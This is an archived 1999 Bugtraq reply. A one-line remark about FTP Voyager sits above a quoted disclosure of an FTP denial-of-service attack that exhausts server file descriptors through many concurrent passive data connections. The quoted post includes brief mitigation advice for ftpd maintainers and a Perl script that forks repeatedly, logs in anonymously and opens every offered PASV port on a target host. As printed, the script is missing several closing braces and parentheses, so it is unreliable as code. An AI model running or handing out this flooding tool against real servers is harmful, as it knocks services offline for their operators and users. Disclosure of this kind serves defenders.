Re: FTP denial of service attack

From: Dustin Miller (dmillerat_private)
Date: Tue Dec 07 1999 - 11:08:49 PST

  • Next message: bert hubert: "Re: FTP denial of service attack"

    FTP Voyager, for Win32, commonly uses one "login" session and then spawns
    "download" sessions for each download you begin with a particular site.
    Dustin Miller, President
    -----Original Message-----
    From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of Darren
    Sent: Tuesday, December 07, 1999 6:30 AM
    To: BUGTRAQat_private
    Subject: FTP denial of service attack
    Who has more free file descriptors & network ports, you or the ftp server ?
    ftpd's which limit connections to 1 per user@host or similar may have some
    defense against this, or if they don't support multiple data connections
    open at the same time.  I suspect "many" is the number of ftpd's which are
    vulnderable to this attack so I've made no attempt (except in one case) to
    contact vendors because there are just too many damn vendors, not to mention
    ftpd's!  But basically, if the other end has, on average, maximum fd limit
    at 63, allows 50 connections, that's 3000 open fd's.  I'm not sure how many
    ftpd's are setup with that many open files as a part of the sytem, but not
    many, I suspect.
    No apologies for using perl(5), I just wanted a quick prototype.  It's not
    perfect but then I did't want to spend too much time on this.
    to ftpd maintainers:
    I don't know of any ftp clients which make use of this feature (multiple
    data channels supported concurrently) as the original ftp clients were all
    line-based and only suported one transfer at a time.  Maybe this is
    reasonable, but it would be a shame for the default defense to this attack
    to mean you can't use FTP to it's full potential (i.e. start a transfer
    from the current session but keep using the current `login' session, maybe
    to start other transfers, as requried).  Triming the number of concurrent
    data sessions to a maximum of 1-5 (by default) would probably be enough,
    with the capability to set this higher/lower as required.
    use IO::Socket;
    $pid = $$;
    $num = 0;
    while (1) {
        while (fork) {
            $sock = IO::Socket::INET->new(
                Proto    => "tcp",
                PeerAddr => $DOS_HOST,
                PeerPort => "ftp(21)",
            if (!$sock) {
                print "connect failed!\n";
                waitpid -1,0;
            while (<$sock>) {
                print $sock "USER anonymous\r\n" if (/^220 .*/);
                print $sock "PASS root@\r\n" if (/^331 .*/);
                print $sock "PASV\r\n" if (/^230 .*/);
                if (/^227 .*/) {
                    $remote = $_;
                    $remote =~ s/^.* [^\d,]*(\d[\d,]+)[^\d,]*$/$1/;
                    @bits = split(/,/, $remote);
                    if ($#bits eq 5) {
                        $remport = $bits[4] * 256 + $bits[5];
                        $#bits = 3;
                        $remip = join('.', @bits);
                        $foo[$num++] = IO::Socket::INET->new(
                                Proto => "tcp",
                                PeerAddr => $remip,
                                PeerPort => "($remport)");
                    print $sock "PASV\r\n";
                last if (/^530 .*/);
            waitpid -1,0;

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